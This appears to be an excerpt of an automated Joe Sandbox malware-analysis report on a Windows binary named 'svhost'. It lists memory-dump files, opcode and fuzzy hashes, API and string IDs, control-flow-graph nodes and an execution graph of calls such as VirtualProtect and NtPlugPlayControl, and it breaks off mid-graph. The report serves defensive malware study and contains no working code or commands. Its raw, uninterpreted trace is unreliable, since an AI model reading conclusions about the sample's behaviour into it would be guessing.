                                                            • Instruction Fuzzy Hash: 28F0FF7190CB4183E651EB51F84422ABB69FB88780B40483AEACC77725DF3CE060CB66

                                                            Control-flow Graph

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.2341812331.00007FF7E32F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E32F0000, based on PE: true
                                                            • Associated: 00000023.00000002.2341768752.00007FF7E32F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000023.00000002.2341857755.00007FF7E32FB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000023.00000002.2341885327.00007FF7E32FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000023.00000002.2342095652.00007FF7E357D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000023.00000002.2342114716.00007FF7E3580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ff7e32f0000_svhost.jbxd
                                                            Similarity
                                                            • API ID: malloc$ExceptionFilterUnhandled_cexit_inittermmemcpystrlen
                                                            • String ID: &$;*
                                                            • API String ID: 3825114775-510990765
                                                            • Opcode ID: bb6b8f63c8978df2cb712fb4502542c6b0eedd4902725eabed431cc5bfcc8d57
                                                            • Instruction ID: 8bfa62c73bfa73297bcfce99685b9611f9a5739786d42d79d436a77536cbc63b
                                                            • Opcode Fuzzy Hash: bb6b8f63c8978df2cb712fb4502542c6b0eedd4902725eabed431cc5bfcc8d57
                                                            • Instruction Fuzzy Hash: 75415F70A0CA8285F780BB25E554379AB98AF84781FC04033C98E737A2DE3DF5609722

                                                            Control-flow Graph

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.2341812331.00007FF7E32F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E32F0000, based on PE: true
                                                            • Associated: 00000023.00000002.2341768752.00007FF7E32F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000023.00000002.2341857755.00007FF7E32FB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000023.00000002.2341885327.00007FF7E32FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000023.00000002.2342095652.00007FF7E357D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000023.00000002.2342114716.00007FF7E3580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ff7e32f0000_svhost.jbxd
                                                            Similarity
                                                            • API ID: memset$wcscatwcscpywcslen
                                                            • String ID: $0$0$@$@
                                                            • API String ID: 4263182637-1413854666
                                                            • Opcode ID: 62e16f804d0a78f42930f5485aab4d55bda2c88156d1efd01dd84db9e24e5fef
                                                            • Instruction ID: e0771d967304a93fc64aa22263104909a7d4dbea621e256de38836415ff72dfe
                                                            • Opcode Fuzzy Hash: 62e16f804d0a78f42930f5485aab4d55bda2c88156d1efd01dd84db9e24e5fef
                                                            • Instruction Fuzzy Hash: E7B1A22190CAC585F3A1AB24E4053BBFBA4FF84344F804236EAC876695DF7DD255CB52

                                                            Control-flow Graph

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.2341812331.00007FF7E32F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E32F0000, based on PE: true
                                                            • Associated: 00000023.00000002.2341768752.00007FF7E32F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000023.00000002.2341857755.00007FF7E32FB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000023.00000002.2341885327.00007FF7E32FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000023.00000002.2342095652.00007FF7E357D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000023.00000002.2342114716.00007FF7E3580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ff7e32f0000_svhost.jbxd
                                                            Similarity
                                                            • API ID: wcslen$memsetwcscatwcscpywcsncmp
                                                            • String ID: 0$X$`
                                                            • API String ID: 329590056-2527496196
                                                            • Opcode ID: 7bd2d40a281e62959ce0fd44c16303bd5a4e704b549ab88744f3f2b4b0171fba
                                                            • Instruction ID: 64cae47ca855179abc3a388dc40198ae8c98b584a840b2b482fd17f28a61f3f0
                                                            • Opcode Fuzzy Hash: 7bd2d40a281e62959ce0fd44c16303bd5a4e704b549ab88744f3f2b4b0171fba
                                                            • Instruction Fuzzy Hash: CF02C42290CBC581E7A0DB25E8043AABBA4FB85794F804236DAEC677E5DF7CD194C711

                                                            Control-flow Graph

                                                            APIs
                                                            • VirtualQuery.KERNEL32(?,?,?,?,00007FF7E32FD3B0,00007FF7E32FD3B0,?,?,00007FF7E32F0000,?,00007FF7E32F1991), ref: 00007FF7E32F1C63
                                                            • VirtualProtect.KERNEL32(?,?,?,?,00007FF7E32FD3B0,00007FF7E32FD3B0,?,?,00007FF7E32F0000,?,00007FF7E32F1991), ref: 00007FF7E32F1CC7
                                                            • memcpy.MSVCRT ref: 00007FF7E32F1CE0
                                                            • GetLastError.KERNEL32(?,?,?,?,00007FF7E32FD3B0,00007FF7E32FD3B0,?,?,00007FF7E32F0000,?,00007FF7E32F1991), ref: 00007FF7E32F1D23
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.2341812331.00007FF7E32F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E32F0000, based on PE: true
                                                            • Associated: 00000023.00000002.2341768752.00007FF7E32F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000023.00000002.2341857755.00007FF7E32FB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000023.00000002.2341885327.00007FF7E32FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000023.00000002.2342095652.00007FF7E357D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000023.00000002.2342114716.00007FF7E3580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ff7e32f0000_svhost.jbxd
                                                            Similarity
                                                            • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                                            • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                            • API String ID: 2595394609-2123141913
                                                            • Opcode ID: f71d7c17d8efb8792bd36a77065ce856a453be169e7440349e6f230ab35daf72
                                                            • Instruction ID: 3595dc8c5a4dbbe49abc49097bff13afc38d97bbf1da98e2e66df8d95229126b
                                                            • Opcode Fuzzy Hash: f71d7c17d8efb8792bd36a77065ce856a453be169e7440349e6f230ab35daf72
                                                            • Instruction Fuzzy Hash: 0F41B361A0964781EA90AB12D4457B8AFA8EF44B84FD44033CE4E777A1DE3CF551D322

                                                            Control-flow Graph

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.2341812331.00007FF7E32F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E32F0000, based on PE: true
                                                            • Associated: 00000023.00000002.2341768752.00007FF7E32F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000023.00000002.2341857755.00007FF7E32FB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000023.00000002.2341885327.00007FF7E32FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000023.00000002.2342095652.00007FF7E357D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000023.00000002.2342114716.00007FF7E3580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ff7e32f0000_svhost.jbxd
                                                            Similarity
                                                            • API ID: CriticalSection$DeleteEnterErrorLastLeaveValuefree
                                                            • String ID:
                                                            • API String ID: 3326252324-0
                                                            • Opcode ID: 30ded24aebec5e3133582754e9744752ca6952f0633bd4de7137b6fa68abc3ee
                                                            • Instruction ID: aa3b938e02d3fe517b3520ca93dda0c0d15a2eeb0e0afd894a4ad4ddf37945b0
                                                            • Opcode Fuzzy Hash: 30ded24aebec5e3133582754e9744752ca6952f0633bd4de7137b6fa68abc3ee
                                                            • Instruction Fuzzy Hash: 65216F24E0A60682FAD5BB11E904379AB68BF01B91FC10033C95D777A4DF3CF9618362

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 329 7ff7e32f1e10-7ff7e32f1e2d 330 7ff7e32f1e2f-7ff7e32f1e38 329->330 331 7ff7e32f1e3e-7ff7e32f1e48 329->331 330->331 332 7ff7e32f1f60-7ff7e32f1f69 330->332 333 7ff7e32f1ea3-7ff7e32f1ea8 331->333 334 7ff7e32f1e4a-7ff7e32f1e53 331->334 333->332 335 7ff7e32f1eae-7ff7e32f1eb3 333->335 336 7ff7e32f1e55-7ff7e32f1e60 334->336 337 7ff7e32f1ecc-7ff7e32f1ed1 334->337 338 7ff7e32f1eb5-7ff7e32f1eba 335->338 339 7ff7e32f1efb-7ff7e32f1f0a call 7ff7e32fa500 335->339 336->333 340 7ff7e32f1f23-7ff7e32f1f2d 337->340 341 7ff7e32f1ed3-7ff7e32f1ee2 signal 337->341 338->332 342 7ff7e32f1ec0 338->342 339->340 351 7ff7e32f1f0c-7ff7e32f1f10 339->351 345 7ff7e32f1f43-7ff7e32f1f45 340->345 346 7ff7e32f1f2f-7ff7e32f1f3f 340->346 341->340 343 7ff7e32f1ee4-7ff7e32f1ee8 341->343 342->340 347 7ff7e32f1f4e-7ff7e32f1f53 343->347 348 7ff7e32f1eea-7ff7e32f1ef9 signal 343->348 345->332 350 7ff7e32f1f5a 346->350 347->350 348->332 350->332 352 7ff7e32f1f55 351->352 353 7ff7e32f1f12-7ff7e32f1f21 signal 351->353 352->350 353->332 353->340
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.2341812331.00007FF7E32F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E32F0000, based on PE: true
                                                            • Associated: 00000023.00000002.2341768752.00007FF7E32F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000023.00000002.2341857755.00007FF7E32FB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000023.00000002.2341885327.00007FF7E32FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000023.00000002.2342095652.00007FF7E357D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000023.00000002.2342114716.00007FF7E3580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ff7e32f0000_svhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: CCG
                                                            • API String ID: 0-1584390748
                                                            • Opcode ID: aac3cff987aa207af6683fbdf05d97adeeaddfa67e5404ea55e0566f274569b7
                                                            • Instruction ID: 3efb2b8db6d357f5e09677086ec0bddc0a6c5ebc5729b14eceb606d3b60c281d
                                                            • Opcode Fuzzy Hash: aac3cff987aa207af6683fbdf05d97adeeaddfa67e5404ea55e0566f274569b7
                                                            • Instruction Fuzzy Hash: 5421E521F0C20642FBF57214954037999899F84764FE48233DD8D733D6DE3CB8A1A663

                                                            Control-flow Graph

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.2341812331.00007FF7E32F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E32F0000, based on PE: true
                                                            • Associated: 00000023.00000002.2341768752.00007FF7E32F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000023.00000002.2341857755.00007FF7E32FB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000023.00000002.2341885327.00007FF7E32FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000023.00000002.2342095652.00007FF7E357D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000023.00000002.2342114716.00007FF7E3580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ff7e32f0000_svhost.jbxd
                                                            Similarity
                                                            • API ID: wcslen
                                                            • String ID: 0$@
                                                            • API String ID: 4088430540-1545510068
                                                            • Opcode ID: ef7ed66185c074b667720f16183e97d9ab3fb1e6636ca8cac5f9c7ec846e676b
                                                            • Instruction ID: 28ac384d9e0869040b64a7dd27d2a5887a51cf82d1e4390c98dc984d98402b52
                                                            • Opcode Fuzzy Hash: ef7ed66185c074b667720f16183e97d9ab3fb1e6636ca8cac5f9c7ec846e676b
                                                            • Instruction Fuzzy Hash: B4119D22528A8082E351DB14F44579AA778FFD8394F904125F6CC93B68EF3DD156CB01

                                                            Control-flow Graph

                                                            APIs
                                                            • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E32F1247), ref: 00007FF7E32F19F9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.2341812331.00007FF7E32F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E32F0000, based on PE: true
                                                            • Associated: 00000023.00000002.2341768752.00007FF7E32F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000023.00000002.2341857755.00007FF7E32FB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000023.00000002.2341885327.00007FF7E32FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000023.00000002.2342095652.00007FF7E357D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000023.00000002.2342114716.00007FF7E3580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ff7e32f0000_svhost.jbxd
                                                            Similarity
                                                            • API ID: ProtectVirtual
                                                            • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                                            • API String ID: 544645111-395989641
                                                            • Opcode ID: 6188dcfb9ba409927f7d43b305952e2ca18d87eecd447261aab3e5aaa2c983f9
                                                            • Instruction ID: 26431571d9e6c19185afc1550a4ec2c4005691c9ad7b89fe9c6e866e65fa0360
                                                            • Opcode Fuzzy Hash: 6188dcfb9ba409927f7d43b305952e2ca18d87eecd447261aab3e5aaa2c983f9
                                                            • Instruction Fuzzy Hash: 18518321F08546C6EB90AB21D840778AB65AB04B94FC48133D99D37794CF3DF5A1D722

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 395 7ff7e32f1800-7ff7e32f1810 396 7ff7e32f1824 395->396 397 7ff7e32f1812-7ff7e32f1822 395->397 398 7ff7e32f182b-7ff7e32f1867 call 7ff7e32f2290 fprintf 396->398 397->398
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.2341812331.00007FF7E32F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E32F0000, based on PE: true
                                                            • Associated: 00000023.00000002.2341768752.00007FF7E32F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000023.00000002.2341857755.00007FF7E32FB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000023.00000002.2341885327.00007FF7E32FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000023.00000002.2342095652.00007FF7E357D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000023.00000002.2342114716.00007FF7E3580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ff7e32f0000_svhost.jbxd
                                                            Similarity
                                                            • API ID: fprintf
                                                            • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                            • API String ID: 383729395-3474627141
                                                            • Opcode ID: d196cce22733da6664e8edb65b95f02763a682be6f02ab55e526d30871c6c29c
                                                            • Instruction ID: 0d8f070fb669a79b369215aef7c1cc2bb8aeeca19a9540b7ecbcad179fd24f75
                                                            • Opcode Fuzzy Hash: d196cce22733da6664e8edb65b95f02763a682be6f02ab55e526d30871c6c29c
                                                            • Instruction Fuzzy Hash: B3F0C811E18A8582E251BB24A9412BAE764EB597C1FC09232DECE73651DF3CF151C311

                                                            Control-flow Graph

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.2341812331.00007FF7E32F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E32F0000, based on PE: true
                                                            • Associated: 00000023.00000002.2341768752.00007FF7E32F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000023.00000002.2341857755.00007FF7E32FB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000023.00000002.2341885327.00007FF7E32FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000023.00000002.2342095652.00007FF7E357D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000023.00000002.2342114716.00007FF7E3580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ff7e32f0000_svhost.jbxd
                                                            Similarity
                                                            • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                            • String ID:
                                                            • API String ID: 682475483-0
                                                            • Opcode ID: 0d3f40a56fc230f51008cd68afb882d42e2fa9fd450aedc21c851e2dc6c825f8
                                                            • Instruction ID: 1d5e1ef474f54ef533540d3dd201a8f07ea86b787b7a8906ea8b52baf44f7036
                                                            • Opcode Fuzzy Hash: 0d3f40a56fc230f51008cd68afb882d42e2fa9fd450aedc21c851e2dc6c825f8
                                                            • Instruction Fuzzy Hash: 5E012125A09A0682F685BB11ED04379DA64BF05F91FC50033CA5D777A4DF3CF9618222

                                                            Execution Graph

                                                            Execution Coverage:2.4%
                                                            Dynamic/Decrypted Code Coverage:0%
                                                            Signature Coverage:0%
                                                            Total number of Nodes:860
                                                            Total number of Limit Nodes:2
                                                            execution_graph 2835 140001ac3 2836 140001a70 2835->2836 2837 140001b36 2836->2837 2840 14000199e 2836->2840 2841 140001b53 2836->2841 2838 140001ba0 4 API calls 2837->2838 2838->2841 2839 140001a0f 2840->2839 2842 1400019e9 VirtualProtect 2840->2842 2842->2840 1977 140001ae4 1979 140001a70 1977->1979 1978 140001b36 1985 140001ba0 1978->1985 1979->1978 1980 14000199e 1979->1980 1983 140001b53 1979->1983 1982 140001a0f 1980->1982 1984 1400019e9 VirtualProtect 1980->1984 1984->1980 1987 140001bc2 1985->1987 1986 140001c04 memcpy 1986->1983 1987->1986 1989 140001c45 VirtualQuery 1987->1989 1990 140001cf4 1987->1990 1989->1990 1994 140001c72 1989->1994 1991 140001d23 GetLastError 1990->1991 1992 140001d37 1991->1992 1993 140001ca4 VirtualProtect 1993->1986 1993->1991 1994->1986 1994->1993 2022 140001404 2095 140001394 2022->2095 2024 140001413 2025 140001394 2 API calls 2024->2025 2026 140001422 2025->2026 2027 140001394 2 API calls 2026->2027 2028 140001431 2027->2028 2029 140001394 2 API calls 2028->2029 2030 140001440 2029->2030 2031 140001394 2 API calls 2030->2031 2032 14000144f 2031->2032 2033 140001394 2 API calls 2032->2033 2034 14000145e 2033->2034 2035 140001394 2 API calls 2034->2035 2036 14000146d 2035->2036 2037 140001394 2 API calls 2036->2037 2038 14000147c 2037->2038 2039 140001394 2 API calls 2038->2039 2040 14000148b 2039->2040 2041 140001394 2 API calls 2040->2041 2042 14000149a 2041->2042 2043 140001394 2 API calls 2042->2043 2044 1400014a9 2043->2044 2045 140001394 2 API calls 2044->2045 2046 1400014b8 2045->2046 2047 140001394 2 API calls 2046->2047 2048 1400014c7 2047->2048 2049 140001394 2 API calls 2048->2049 2050 1400014d6 2049->2050 2051 1400014e5 2050->2051 2052 140001394 2 API calls 2050->2052 2053 140001394 2 API calls 2051->2053 2052->2051 2054 1400014ef 2053->2054 2055 1400014f4 2054->2055 2056 140001394 2 API calls 2054->2056 2057 140001394 2 API calls 2055->2057 2056->2055 2058 1400014fe 2057->2058 2059 140001503 2058->2059 2060 140001394 2 API calls 2058->2060 2061 140001394 2 API calls 2059->2061 2060->2059 2062 14000150d 2061->2062 2063 140001394 2 API calls 2062->2063 2064 140001512 2063->2064 2065 140001394 2 API calls 2064->2065 2066 140001521 2065->2066 2067 140001394 2 API calls 2066->2067 2068 140001530 2067->2068 2069 140001394 2 API calls 2068->2069 2070 14000153f 2069->2070 2071 140001394 2 API calls 2070->2071 2072 14000154e 2071->2072 2073 140001394 2 API calls 2072->2073 2074 14000155d 2073->2074 2075 140001394 2 API calls 2074->2075 2076 14000156c 2075->2076 2077 140001394 2 API calls 2076->2077 2078 14000157b 2077->2078 2079 140001394 2 API calls 2078->2079 2080 14000158a 2079->2080 2081 140001394 2 API calls 2080->2081 2082 140001599 2081->2082 2083 140001394 2 API calls 2082->2083 2084 1400015a8 2083->2084 2085 140001394 2 API calls 2084->2085 2086 1400015b7 2085->2086 2087 140001394 2 API calls 2086->2087 2088 1400015c6 2087->2088 2089 140001394 2 API calls 2088->2089 2090 1400015d5 2089->2090 2091 140001394 2 API calls 2090->2091 2092 1400015e4 2091->2092 2093 140001394 2 API calls 2092->2093 2094 1400015f3 2093->2094 2096 140005950 malloc 2095->2096 2097 1400013b8 2096->2097 2098 1400013c6 NtPlugPlayControl 2097->2098 2098->2024 2099 140002104 2100 140002111 EnterCriticalSection 2099->2100 2101 140002218 2099->2101 2102 14000220b LeaveCriticalSection 2100->2102 2106 14000212e 2100->2106 2103 140002272 2101->2103 2105 140002241 DeleteCriticalSection 2101->2105 2107 140002230 free 2101->2107 2102->2101 2104 14000214d TlsGetValue GetLastError 2104->2106 2105->2103 2106->2102 2106->2104 2107->2105 2107->2107 1995 140001e65 1996 140001e67 signal 1995->1996 1997 140001e7c 1996->1997 1999 140001e99 1996->1999 1998 140001e82 signal 1997->1998 1997->1999 1998->1999 2843 140001f47 2844 140001e67 signal 2843->2844 2847 140001e99 2843->2847 2845 140001e7c 2844->2845 2844->2847 2846 140001e82 signal 2845->2846 2845->2847 2846->2847 2000 14000216f 2001 140002185 2000->2001 2002 140002178 InitializeCriticalSection 2000->2002 2002->2001 2003 140001a70 2004 14000199e 2003->2004 2007 140001a7d 2003->2007 2005 140001a0f 2004->2005 2006 1400019e9 VirtualProtect 2004->2006 2006->2004 2007->2003 2008 140001b53 2007->2008 2009 140001b36 2007->2009 2010 140001ba0 4 API calls 2009->2010 2010->2008 2108 140001e10 2109 140001e2f 2108->2109 2110 140001e55 2109->2110 2111 140001ecc 2109->2111 2115 140001eb5 2109->2115 2110->2115 2116 140001f12 signal 2110->2116 2112 140001ed3 signal 2111->2112 2111->2115 2113 140001ee4 2112->2113 2112->2115 2114 140001eea signal 2113->2114 2113->2115 2114->2115 2116->2115 2848 140002050 2849 14000205e EnterCriticalSection 2848->2849 2850 1400020cf 2848->2850 2851 1400020c2 LeaveCriticalSection 2849->2851 2852 140002079 2849->2852 2851->2850 2852->2851 2853 1400020bd free 2852->2853 2853->2851 2854 140001fd0 2855 140001fe4 2854->2855 2856 140002033 2854->2856 2855->2856 2857 140001ffd EnterCriticalSection LeaveCriticalSection 2855->2857 2857->2856 2125 140001ab3 2126 140001a70 2125->2126 2126->2125 2127 140001b36 2126->2127 2128 14000199e 2126->2128 2131 140001b53 2126->2131 2129 140001ba0 4 API calls 2127->2129 2130 140001a0f 2128->2130 2132 1400019e9 VirtualProtect 2128->2132 2129->2131 2132->2128 1967 140001394 1971 140005950 1967->1971 1969 1400013b8 1970 1400013c6 NtPlugPlayControl 1969->1970 1972 14000596e 1971->1972 1975 14000599b 1971->1975 1972->1969 1973 140005a43 1974 140005a5f malloc 1973->1974 1976 140005a80 1974->1976 1975->1972 1975->1973 1976->1972 2117 14000219e 2118 140002272 2117->2118 2119 1400021ab EnterCriticalSection 2117->2119 2120 140002265 LeaveCriticalSection 2119->2120 2122 1400021c8 2119->2122 2120->2118 2121 1400021e9 TlsGetValue GetLastError 2121->2122 2122->2120 2122->2121 2011 140001800 2012 140001812 2011->2012 2013 140001835 fprintf 2012->2013 2014 140001000 2015 14000108b __set_app_type 2014->2015 2016 140001040 2014->2016 2018 1400010b6 2015->2018 2016->2015 2017 1400010e5 2018->2017 2020 140001e00 2018->2020 2021 140005ee0 __setusermatherr 2020->2021 2123 140002320 strlen 2124 140002337 2123->2124 2133 140001140 2136 140001160 2133->2136 2135 140001156 2137 1400011b9 2136->2137 2138 14000118b 2136->2138 2139 1400011d3 2137->2139 2140 1400011c7 _amsg_exit 2137->2140 2138->2137 2141 1400011a0 Sleep 2138->2141 2142 140001201 _initterm 2139->2142 2143 14000121a 2139->2143 2140->2139 2141->2137 2141->2138 2142->2143 2159 140001880 2143->2159 2146 14000126a 2147 14000126f malloc 2146->2147 2148 14000128b 2147->2148 2150 1400012d0 2147->2150 2149 1400012a0 strlen malloc memcpy 2148->2149 2149->2149 2149->2150 2170 140003150 2150->2170 2152 140001315 2153 140001344 2152->2153 2154 140001324 2152->2154 2157 140001160 67 API calls 2153->2157 2155 140001338 2154->2155 2156 14000132d _cexit 2154->2156 2155->2135 2156->2155 2158 140001366 2157->2158 2158->2135 2160 140001247 SetUnhandledExceptionFilter 2159->2160 2161 1400018a2 2159->2161 2160->2146 2161->2160 2164 14000194d 2161->2164 2166 140001a20 2161->2166 2162 14000199e 2162->2160 2165 1400019e9 VirtualProtect 2162->2165 2163 140001ba0 4 API calls 2163->2164 2164->2162 2164->2163 2165->2162 2166->2162 2167 140001b36 2166->2167 2169 140001b53 2166->2169 2168 140001ba0 4 API calls 2167->2168 2168->2169 2173 140003166 2170->2173 2171 1400032a4 wcslen 2255 14000153f 2171->2255 2173->2171 2175 14000349e 2175->2152 2178 14000339f 2181 1400033c5 memset 2178->2181 2184 1400033f7 2181->2184 2183 140003447 wcslen 2185 14000345d 2183->2185 2189 14000349c 2183->2189 2184->2183 2186 140003470 _wcsnicmp 2185->2186 2187 140003486 wcslen 2186->2187 2186->2189 2187->2186 2187->2189 2188 140003561 wcscpy wcscat memset 2191 1400035a0 2188->2191 2189->2188 2190 1400035e3 wcscpy wcscat memset 2193 140003626 2190->2193 2191->2190 2192 14000372e wcscpy wcscat memset 2194 140003770 2192->2194 2193->2192 2195 140003ac4 wcslen 2194->2195 2196 140003ad2 2195->2196 2200 140003b0b 2195->2200 2197 140003ae0 _wcsnicmp 2196->2197 2198 140003af6 wcslen 2197->2198 2197->2200 2198->2197 2198->2200 2199 140003b88 wcscpy wcscat memset 2201 140003bca 2199->2201 2200->2199 2202 140003c0d wcscpy wcscat memset 2201->2202 2204 140003c53 2202->2204 2203 140003c83 wcscpy wcscat memset 2206 140003cd7 2203->2206 2204->2203 2205 140003d1c wcscpy wcscat wcslen 2395 14000146d 2205->2395 2206->2205 2209 140003ec6 2212 140003f67 memset 2209->2212 2216 1400055e8 2212->2216 2217 140003f8b wcscpy wcscat wcslen 2212->2217 2213 140003e33 2481 1400014a9 2213->2481 2214 140003f4a 2215 14000145e 2 API calls 2214->2215 2215->2209 2235 1400040b0 2217->2235 2221 140003f39 2224 14000145e 2 API calls 2221->2224 2224->2209 2226 140003eba 2227 14000145e 2 API calls 2226->2227 2227->2209 2228 1400041a5 wcslen 2229 14000153f 2 API calls 2228->2229 2229->2235 2230 14000521a memcpy 2230->2235 2231 1400045fd wcslen 2233 14000153f 2 API calls 2231->2233 2232 140004388 wcslen 2642 14000157b 2232->2642 2233->2235 2235->2228 2235->2230 2235->2231 2235->2232 2236 140004416 memset 2235->2236 2237 140004eb1 wcscpy wcscat wcslen 2235->2237 2238 140004480 wcslen 2235->2238 2242 1400044ec _wcsnicmp 2235->2242 2244 140004ff3 2235->2244 2245 14000509e wcslen 2235->2245 2246 14000537f memcpy 2235->2246 2248 140004c4a memset 2235->2248 2249 1400026e0 11 API calls 2235->2249 2250 140004e50 memset 2235->2250 2251 140004cab memset 2235->2251 2252 140004d05 wcscpy wcscat wcslen 2235->2252 2254 14000145e NtPlugPlayControl malloc 2235->2254 2597 1400014d6 2235->2597 2670 140001521 2235->2670 2768 140001431 2235->2768 2236->2235 2239 140001422 2 API calls 2237->2239 2659 1400015a8 2238->2659 2239->2235 2242->2235 2244->2152 2247 1400015a8 2 API calls 2245->2247 2246->2235 2247->2235 2248->2235 2248->2250 2249->2235 2250->2235 2251->2235 2699 140001422 2252->2699 2254->2235 2256 140001394 2 API calls 2255->2256 2257 14000154e 2256->2257 2258 140001394 2 API calls 2257->2258 2259 14000155d 2258->2259 2260 140001394 2 API calls 2259->2260 2261 14000156c 2260->2261 2262 140001394 2 API calls 2261->2262 2263 14000157b 2262->2263 2264 140001394 2 API calls 2263->2264 2265 14000158a 2264->2265 2266 140001394 2 API calls 2265->2266 2267 140001599 2266->2267 2268 140001394 2 API calls 2267->2268 2269 1400015a8 2268->2269 2270 140001394 2 API calls 2269->2270 2271 1400015b7 2270->2271 2272 140001394 2 API calls 2271->2272 2273 1400015c6 2272->2273 2274 140001394 2 API calls 2273->2274 2275 1400015d5 2274->2275 2276 140001394 2 API calls 2275->2276 2277 1400015e4 2276->2277 2278 140001394 2 API calls 2277->2278 2279 